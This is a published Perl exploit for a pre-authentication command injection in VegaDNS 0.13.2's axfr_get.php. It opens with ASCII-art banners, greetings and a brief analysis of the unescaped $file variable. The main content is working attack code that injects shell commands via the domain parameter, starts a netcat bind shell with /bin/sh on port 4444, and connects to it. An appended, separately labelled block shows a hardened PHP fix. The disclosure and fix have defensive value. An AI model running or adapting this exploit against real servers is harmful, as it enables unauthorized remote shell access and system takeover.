VegaDNS 0.13.2 - Remote Command Injection
Source: justanotherhacker.com  Author: Wireghoul  Published: 2016-09-21
#!/usr/bin/perl
                                                                                                                                                                       $izd= qq{
  ██╗███████╗██╗   ██╗███╗   ██╗ █████╗     ██████╗ ██████╗  ██████╗ ██████╗
  ██║╚══███╔╝██║   ██║████╗  ██║██╔══██╗    ██╔══██╗██╔══██╗██╔═══██╗██╔══██╗
  ██║  ███╔╝ ██║   ██║██╔██╗ ██║███████║    ██║  ██║██████╔╝██║   ██║██████╔╝
  ██║ ███╔╝  ██║   ██║██║╚██╗██║██╔══██║    ██║  ██║██╔══██╗██║   ██║██╔═══╝
  ██║███████╗╚██████╔╝██║ ╚████║██║  ██║    ██████╔╝██║  ██║╚██████╔╝██║
  ╚═╝╚══════╝ ╚═════╝ ╚═╝  ╚═══╝╚═╝  ╚═╝    ╚═════╝ ╚═╝  ╚═╝ ╚═════╝ ╚═╝
                                                                                                                                                                       };$vg=qq{
         ▀  ▐░░▄                    ▄▄▄▄▄▄▄
     ▀▀  ▄░  ▐▀▄▀▄              ▄▄▓▓▓▒▒▒▒▒▒▓▓▄
 ▀▀▀ ▐▄▄░  ▀▐▄ ▄▀▄ ▄         ▄▄▀▀▀ ▀▀▓▓▓▓▒▒░▒▓▓▌
        ▀ ▄  ▐▀▄  ▀▄░       ▄▄░░      ▀▓▓▓▓▓▓▓▓▓▌
             ▐▀▄▀▄  ▀▀▄▀▄   ▓▌░░     ▄▄▐▓▀▓▓░▀▓▓▓▌
              ▀▄▀▄▀▄░ ▐▀▄▀▄  ▐▓▒▄▄ ░▓▀ ▐▀▄▀▒▄▄▒▀▓▓▓▄      ▄▄▄▓▓▓▓▄▄▄
                ▀ ▀▄▀▌▄░ ▀▄▒▄ ▐▀▓▓       ░░ ▒░░   ▀▀▒▒▒▓▓▒░░░    ░░▒▒▄
                  ▀ ▀ ▐▌ ░█░ ▒▌▐▀▄░▄      ▒░▒░░      ░░▒░           ░░▓
                    ▐▄ ░░░ ░▒░░▒▌ █▄▒░▄  ▄▓▒░  ▐░░ ░░░▒░             ░░
                   ▓▓░▄▓ ░▒░  ░░▐▓  ██▓▓▓▓▓░▄▄ ▐░░░▒▄▒░░░   ░      ░░░░
                    ▀█▓▒▓▓ ░░░░ ░█▒▓▒▒▒▒███▒█▒▒░▒░▐▓▒░░░░░░░ ░   ░░▒▒▒░▒
                         █░░  ░▒▒░░█▒▒░░░░░ ░░░░░▐▓▒░░░ ░░░ ░░░▒▒▒█░ ░▒▒
                     ▐▒▒▒  █▒▓▌░░░ ░░░▒▒▒░░░░▒▓▓▒██▀▀░░ ░░  ░ ░░▒░░░  ░▒
                 ▓▒░░▐▒░ ░▓  ██▌░░░▄▒▒░░▒▒▒░▒▒▓▓░░     ░░░░▒▄░░▒░░    ░▒
                ▓▒ ░▒▒▒█ ░▒▓  ▐▒▓░▒▒░  ▐░░ ▀▒▒▒░░░   ░   ▐░░▒▒▒     ░ ░
               █░▀▒▒▓▓▓▒▒░░▓ ▄▒░ ▀▒░░░░   ░    ░░░░░    ░░▒▒▒    ░   ▒▒
                ▀▓▓▀░▓▌▒░▒  ░▒▓▓▓▒▒▒░░░░         ░    ░░▒▒░  ░      ░░▒
                  ▀▀▓▓▌▀░  ░ ░▐▓▓▓▒▓▓▓▄░░░▄     ▐░░░▒▒▒▀ ▐░▒▄░    ▐░░░▒
                      ▐▒▒░░▄▓▓░▌  ░▒▒▓▓▓▓▒░░░ ░▒░▒▓▒▒░▒░░░░░▒░   ░░▒▒▒▓
                       ▀▓▓▀▒▄░░░░░ ░▒▒▓▓▌▀▀▓▓▄▓▒▓░░▒▒░░░▒▓▒▓▓▀▀▀▀▀▀▀▀▀▓▓▄
                         ▓▒░░░▄   ░░▒▓▀       ▀▓▓▓▒▒▓▓▓▓▀░░▒▒▒▀▓▓▓▓▀▀▀▀▓▓
                          ▀▓▄▒▒▒░░░▒▓          ▐▓▓▓▓▓▒▒▒▓▓▀▒▒▒▀▀░░░░░▒▒▒▓▓▓▄
                             ▀▀▀▀  ▀           ▐▓▓▓▀▀▀▀░░░░▒░░▒▒▒▓▓▓▓▒▀▀▀▓▓▌
                                             ▄▓▓▓▓▀▀▓▓▓▓▓▓██▀▀▀░░░░░     ▒
                                            ▓▒▒▓▌░░░░░░░▒▌░░░░ ░   ░  ▀  ░▄
                                           ▓▓▓▓▒▌▄░▒▒▒▒▓▒░░░░▀   ░░░   ░░░▒▌
                                          ▄▓▀▀░░░▒▒▄▒▒▓▓░░▄▒░░░▄▄▄▄  ░░░░░▐░
                                      ▄▐█▒  ▒░▒▒▒▒░░▓▓▓▒▓▓▓▒▒▒▀░░▀   ▀  ░░▒▌
                                  ▄▓▒▒░░░░░░▒▒▒▒▒░▒▓▓▓▓▓▓▓▒▒░   ░    ░  ▒▒█▀
                               ▐▓▒░░░░░░░▒▒▒▒▒▒░▒▓▓▓▓▓▓▓▓▒▌    ░  ▐░ ░  ░▒
                             ▐▒░░░░░░▒▒▒▒▒▒░░▓▓▓▓▓▓▓▓▓▓▓▒▌░   ░   ▐░░░  ░█
                          ▒█░░░░░░▒▒▒▒░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▌   ░   ▐░░░ ░░▒
                      ▐▓▒░▒░░░░░▒▒▒░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒▒░░      ░░░░ ░░▒
                   ▄▓▒▒▒░░░░░░░░░░░▓░▓▓▒▓▓▓▓█▀▒▓▓▓▓▓▓▓▓▒░      ░░░░  ░░
                  ▄▒░░░░   ░░░░▒▒▓▓▓▓██▌▐▓▓▓░░▓▓▌░▓▓▓▓▒░  ░  ░░░░  ░░▒
                  ▒░░░░░░▒▒▓▓▓▓▓▓▓█    ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░  ░ ░░░░  ▐▒▌
                 ▒▀░░░▒░░▓▒▓▓▓▓▓▌▀     ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░  ░▒▌
                 ▓ ░▒░░░▀▀▒▓▓▓▓▓▌      ▐▓▓▓ ░░░░░░▓▓▓▓▒░ ░ ░ ░ ░▒▒▌
                ▓▓▒░▒░░▒▒▒▓▓▓▓▓▓▌           ▀▓▓▓▓▓▓▓▓▒░  ░░░ ░▄░▒▓▌
                 ░ ▀▒▓▓▓▓▓▓▓▓▓▌▀▀                   ▒░      ░ ░░▓▓▄
                 ░        ▓                        ▓▒░       ░░▒▀▒░▒▄
                ▄     ░  ▀                          ▓▒░░▄░░░░░▀░░░▌░░▒
                ░     ▄▄▀                            ▀▒▒▒▒▒▄ ▄░░░░  ▀▀
                     ░░░                              ▓▓▓▒▒▓▄░░ ░ ▐░▄ ░
               ░   ░▀░░                               ▀▀▒▒▒▒▀       ▀▒ ▄
         ▄▄▄▄▄▄   ▄▀▒▓▌▄                                   ▀▄        ░ ░
         ▓▓▓▓▌▄  ▄▓▓▓▓▓▓▓                                    ▒ ▄      ░ ▄
         ▓▒▒▓▓▓▓▓▓▓▓▒▓▓▓▓▓                                       ░    ▀▓ ▄
         ▓▒▒▓▓▓▓▓▓▒▓▓▓▓▓▀                                          ░   ▀▄░▒▌▄▄
     ▄▄▄▓▓▓▓▓▓▓▓▓▓▓███▀                                            ▄▓▄▄▄▄▄▒▓▓▓▓▄
 ▄▓▓▓▓▓▓▓▓▓▒▓▓▓▓▓█                                               ▐▓████▓▓▓▓▓▓▒▓▓
▓▓▓▓▄▄▄▄▓▓▓▓▓▓▓█                                                  ▐▓░░░▒▓▓▓▓▒▓▓
                                                                  ▐▓▓░▒▓▓▓▓▓▓▓
                                                                  ▐▓▓▓▓▓▓▒▒▓▌
                                                              ▓▓▓▓█▒▒▒▒▒▒▒▓▓▌
                                                             ██▒░░░░░░░▓▓███
 
                                                                                                                                                                        };$b=qq{
  ██╗   ██╗███████╗ ██████╗  █████╗ ██████╗ ███╗   ██╗███████╗
  ██║   ██║██╔════╝██╔════╝ ██╔══██╗██╔══██╗████╗  ██║██╔════╝
  ██║   ██║█████╗  ██║  ███╗███████║██║  ██║██╔██╗ ██║███████╗
  ╚██╗ ██╔╝██╔══╝  ██║   ██║██╔══██║██║  ██║██║╚██╗██║╚════██║
   ╚████╔╝ ███████╗╚██████╔╝██║  ██║██████╔╝██║ ╚████║███████║
    ╚═══╝  ╚══════╝ ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚═╝  ╚═══╝╚══════╝
 
 
  ██████╗ ███████╗███╗   ███╗ ██████╗ ████████╗███████╗
  ██╔══██╗██╔════╝████╗ ████║██╔═══██╗╚══██╔══╝██╔════╝
  ██████╔╝█████╗  ██╔████╔██║██║   ██║   ██║   █████╗
  ██╔══██╗██╔══╝  ██║╚██╔╝██║██║   ██║   ██║   ██╔══╝
  ██║  ██║███████╗██║ ╚═╝ ██║╚██████╔╝   ██║   ███████╗
  ╚═╝  ╚═╝╚══════╝╚═╝     ╚═╝ ╚═════╝    ╚═╝   ╚══════╝
 
 
  ███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗    ██████╗ ██╗   ██╗
  ██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝    ██╔══██╗╚██╗ ██╔╝
  █████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║       ██████╔╝ ╚████╔╝
  ██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║       ██╔══██╗  ╚██╔╝
  ███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║       ██████╔╝   ██║
  ╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝       ╚═════╝    ╚═╝
 
 
                                         ▄
                                  ▄█▀      ▀█▄▄
                             ▄▄▓▀▀             ▀▓▄▄
                          ▄▓▓▀                    ▀█▓▄
                       ▄▓▓▀                          ▀▓▓▓▄
                    ▄▓▓█▀                               ▀▓▓▄▄
                 ▄▓▓▓▀                                    ▀▓▓▓▄
               ▄▓▓▓▀                                        ▀▓▓▓▓
             ▓▓▓▓▀                                            ▀▓▓▓▓▄
           ▓▓▓▓█                                                ▀▓▓▓▓
          ▐▓▓▓▀                                                   ▓▓▓▌
           ▓▓▓▌                                                  ▐▓▓▓
            ▓▓▓▌                                                ▄▓▓▓
             ▓▓▓▓                                              ▄▓▓▓
              ▓▓▓▓▓▓▓▓▓▓██                            ██▓▓▓▓▓▓▓▓▓▓
               ▀▀▀▀      ▄▄▄▄▄▄▄▄▄▄▄        ▄▄▄▄▄▄▄▄▄▄▄       ▀▀█
                ▄▄▓▓▓▓▓▓▓▓▓▓▓████▓▓▓▓▓▀   ▓▓▓▓▓████▓▓▓▓▓▓▓▓▓▓▓▄▄
            ▄▓▓▓▓█▀▀▀              ▓▓█    ▐▓▓              ▀▀▀█▓▓▓▓▓
             ▓▓▓                  ▐▓█      ▀▓▌                  ▓▓▓
              █▓▌                 ▓▀    ▌   ▀▓                 ▐▓▓
               ▀▓  ▄          ▄▀ ▐   ▌ ▓▓ ▐▄  █ ▀▓▄         ▄▌ ▓▀
                 █ ▀▓▄     ▄▓█     ▄▓ ▐▓▓▌ █▓     ▀▓▄▄    ▄▓▀ ▓
              ▄▌     █▓▓▓▓▓▀      ▓▓▓▄▓▌▐▓▄▄▓▓      ▀▓▓▓▄▓▓▀    ▐▄
             ▓▓        █▀▀                             ▀█▀       ▀▓
            ▓▓           ▄  ▄▀                     ▄   ▄          ▓▓
           ▓▓▓▄       ▄▓▀ ▄█    ▄              ▄    ▀▄ ▀▓▄        ▓▓▓
          ████▀▀▀▀▀▀▀▀▀  ▓▀  ▄ ▄                ▓ █   ▓  ▀▀▀▀▀▀▀▀▀████
                       ▄▓▀  ▓ ▄▌▐     ▐  ▌     ▌▐▓ ▓   ▓▄
                      ▄▓ ▄▄▓▌▐▓ ▐   ▓ ▓  ▓ ▐▄  ▌ ▓▌▐▓▄▄ ▓▓
                     ▓▓▓█▀▀  ▀█▓▓▌ ▓ ▐▓  █▌ ▓  ▓▓█▀  ▀▀█▓▓▓
                    █▀          ▀ ▐▓▄▓▌  ▐▓▄▓▌ ▀          ▀█
                                     ▀    ▀▀
 
 
         ___ .___ .______  ._______._____  .___.__  ._______  .____     .___
.___    |   |: __|: __   \ : .____/:_ ___\ :   |  \ : .___  \ |    |___ |   |
:   | /\|   || : ||  \____|| : _/\ |   |___|   :   || :   |  ||    |   ||   |
|   |/  :   ||   ||   :  \ |   /  \|   /  ||   .   ||     :  ||    :   ||   |/\
|   /       ||   ||   |___\|_.: __/|. __  ||___|   | \_. ___/ |        ||   /  \
|______/|___||___||___|       :/    :/ |. |    |___|   :/     |. _____/ |______/
        :                           :   :/             :       :/
        :                               :                      :
 
                                                                                                                                                                        };$g=qq{
 
   ██████╗ ██████╗ ███████╗███████╗████████╗███████╗
  ██╔════╝ ██╔══██╗██╔════╝██╔════╝╚══██╔══╝╚══███╔╝
  ██║  ███╗██████╔╝█████╗  █████╗     ██║     ███╔╝
  ██║   ██║██╔══██╗██╔══╝  ██╔══╝     ██║    ███╔╝
  ╚██████╔╝██║  ██║███████╗███████╗   ██║   ███████╗
   ╚═════╝ ╚═╝  ╚═╝╚══════╝╚══════╝   ╚═╝   ╚══════╝
 
To all the people with mad skills who share their knowledge:
 
  TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO,
  mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan,
  lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil,
  laughing_mantis, g0tm1k, nmrc, and many many more....
 
                                                                                                                                                                        };$a=qq^
 
   █████╗ ███╗   ██╗ █████╗ ██╗  ██╗   ██╗███████╗██╗███████╗
  ██╔══██╗████╗  ██║██╔══██╗██║  ╚██╗ ██╔╝██╔════╝██║██╔════╝
  ███████║██╔██╗ ██║███████║██║   ╚████╔╝ ███████╗██║███████╗
  ██╔══██║██║╚██╗██║██╔══██║██║    ╚██╔╝  ╚════██║██║╚════██║
  ██║  ██║██║ ╚████║██║  ██║███████╗██║   ███████║██║███████║
  ╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚══════╝╚═╝   ╚══════╝╚═╝╚══════╝l
 
VegaDNS is a tinydns administration tool written in PHP to allow easy
administration of DNS records through a web browser.
-- http://www.vegadns.org
 
 
The file axfr_get.php allows unauthenticated access and fails to correctly
apply input escaping to all variables that are based on user input. This
allows an attacker to inject shell syntax constructs to take control of the
command execution.
 
The following code from axfr_get.php shows how the variable $file becomes
tainted through the $domain variable, which is tainted from direct user input.
The application tries to prevent this by escaping the $domain and $hostname
variables, but fails to escape the $file variable.
 
---------------------------cut---------------------------
 * NOTE:
 *          This functionality ONLY exists outside of the main application
 *          because tcplient kept dying fatally due to file descriptor 7
 *          being unavailable, which only occurs AFTER session_start() is
 *          called.
 *
 */
require_once 'src/config.php';
// CHECKS
// Make sure the hostname was given
if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") {
    echo "ERROR: no hostname given\n";
    exit;
}
// Make sure that some domains were given
if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") {
    echo "ERROR: no domain was supplied\n";
    exit;
}
$domain = $_REQUEST['domain'];
$hostname = $_REQUEST['hostname'];
$rand = rand();
$file = "/tmp/$domain.$rand";
$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1";
exec($command, $out);
---------------------------end---------------------------
 
  ███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
  ██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
  █████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║
  ██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║
  ███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║
  ╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝
                                                                                                                                                                              ^;
 
print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by \@Wireghoul\n";
print "  "."=" x 50 ."[justanotherhacker.com]==\n";
&usage if ($ARGV[0] !~ m!.+://([^/:]+)!);
$h=$1;
print "  . . . Locating netcat\n";
$cmd='which+nc';
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -s -k '$t'`;
if ($z !~ m{/nc}) {
    print "  ! ! ! netcat not found! Manual exploitation required:\n";
    print "        $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n";
    exit 1;
}
print "  . . . netcat found: $z\n";
print "  . . . Performing IZUNA DROP!\n";
#  ← · ↑ · → · ↓ · ↖ · ↗ · ↘ · ↙
print "      ↓ ↓ ↑ *k* → → *p*\n";
$cmd="$z+-e+/bin/sh+-lp+4444";
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -m 3 -s -k '$t &'`;
print $vg."\n";
print "  . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n";
system("nc -v $h 4444");
sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit; }
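
A hardened form of the axfr_get.php fragment quoted in the analysis above, as an added example that is not VegaDNS code or part of the original advisory: it allowlists both request parameters, stops deriving the temporary path from request data, and quotes every argument with escapeshellarg(). The helper name is_safe_dns_token() and the axfr_ file prefix are hypothetical, and PHP 7+ is assumed for random_bytes().

```php
<?php
// Added example, not VegaDNS code: hardened form of the quoted axfr_get.php fragment.
// Access control for the script itself is a separate fix and is not shown here.
require_once 'src/config.php';   // defines $dns_tools_dir, as in the original

// Hypothetical helper: accept an IP literal, or a name built only from
// letters, digits, '_', '-' and '.' that does not start with '-' (so it can
// never be read as a command-line option). This is an allowlist, not a full
// RFC 1035 validator.
function is_safe_dns_token(string $value): bool
{
    if (filter_var($value, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    return preg_match('/^[A-Za-z0-9_][A-Za-z0-9_.-]{0,252}$/D', $value) === 1;
}

$domain   = $_REQUEST['domain']   ?? '';
$hostname = $_REQUEST['hostname'] ?? '';

// Reject arrays (domain[]=...) as well as strings outside the allowlist.
if (!is_string($domain) || !is_string($hostname)
    || !is_safe_dns_token($domain) || !is_safe_dns_token($hostname)) {
    http_response_code(400);
    echo "ERROR: invalid hostname or domain\n";
    exit;
}

// The original built the path as "/tmp/$domain.$rand", which carried request
// data into the command line unescaped. Use a random name with no request data.
$file = sys_get_temp_dir() . '/axfr_' . bin2hex(random_bytes(16));

// Quote every argument individually, including both file paths.
// escapeshellarg() is the function intended for single arguments;
// escapeshellcmd() leaves paired quotes untouched.
$argv = [
    "$dns_tools_dir/tcpclient", '-R', $hostname, '53',
    "$dns_tools_dir/axfr-get", $domain, $file, "$file.tmp",
];
$command = implode(' ', array_map('escapeshellarg', $argv)) . ' 2>&1';

exec($command, $out, $status);
if ($status !== 0) {
    echo "ERROR: zone transfer failed\n";
    exit;
}
```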
 